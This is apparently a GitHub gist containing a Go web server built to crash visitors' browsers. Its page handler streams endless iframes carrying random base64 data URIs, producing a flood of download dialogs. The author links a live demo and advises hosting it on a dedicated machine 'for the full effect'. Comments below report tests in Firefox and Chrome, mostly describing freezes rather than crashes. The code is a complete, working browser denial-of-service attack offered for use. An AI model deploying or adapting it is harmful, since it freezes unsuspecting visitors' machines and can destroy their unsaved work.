-
-
Save wybiral/33caed8738bbc21bb0850f300cc19b5c to your computer and use it in GitHub Desktop.
// The basic strategy is to send an endless number of iframes with data URIs | |
// This causes a flood of download modals that crashes most desktop clients | |
// | |
// Currently running demo at: https://fan-pages.herokuapp.com | |
// | |
// NOTE: This server has received more traffic than expected so sometimes it | |
// doesn't serve the HTML fast enough. For the full effect run this Go server | |
// on a dedicated machine somewhere. | |
// | |
// PS: Save your work before you open it ;) | |
package main | |
import ( | |
"encoding/base64" | |
"math/rand" | |
"net/http" | |
"os" | |
) | |
func main() { | |
http.HandleFunc("/", flood) | |
port := os.Getenv("PORT") | |
addr := ":" + port | |
http.ListenAndServe(addr, nil) | |
} | |
func flood(w http.ResponseWriter, r *http.Request) { | |
w.Header().Set("Content-Type", "text/html; charset=utf-8") | |
flusher, ok := w.(http.Flusher) | |
if !ok { | |
return | |
} | |
data := make([]byte, 16) | |
head := []byte("<iframe src=\"data:application/octet-stream;base64,") | |
foot := []byte("\"></iframe>") | |
for { | |
for i := 0; i < 100; i++ { | |
_, err := w.Write(head) | |
if err != nil { | |
return | |
} | |
rand.Read(data) | |
encoder := base64.NewEncoder(base64.StdEncoding, w) | |
_, err = encoder.Write(data) | |
if err != nil { | |
return | |
} | |
encoder.Close() | |
_, err = w.Write(foot) | |
if err != nil { | |
return | |
} | |
} | |
flusher.Flush() | |
} | |
} |
@avoidwork try it with Firefox
Okay, tried with Firefox (Aurora 59x) and does not crash. Maybe 50+ download dialogs popup, then it stops; I close them and scroll a bit and the same happens. No crash.
@emayljames on desktop? What OS?
@wybiral Windows 7 Home 64bit
Does not crash Firefox Nightly 60. 👍
@canuckistani what happens on Nightly?
Also, be aware that under some conditions it may fail just because it's running from a tiny free Heroku instance and it relies on being able to flood the browser. For best results run it on something more robust or run the Go server from a dedicated machine.
It opened a ton of download dialog boxes but didn't particularly crash. There is a whole lot of 'em.
Firefox 58.0.2 (64-bit), macOS 10.12.6. It did make my browser very unresponsive, but I was able to close the tab without any tricks. Just hitting the X button on the tab a few times to get it to register.
I too had a load of download dialogues but no crash. I use Nightly.
Firefox 58, Linux. I got tired of waiting for it to crash so I just kill'd it to get rid of all the dialog boxes.
On Firefox 58.0.2 (64-bit), Windows 10 1709 (x64), Did not crash my browser, it became non responsive for a time 3 minutes or so but the download dialogs stopped and returned to normal once I mass closed all the download windows.
my cpu went to 25% with chrome on an i7-7700k; no crash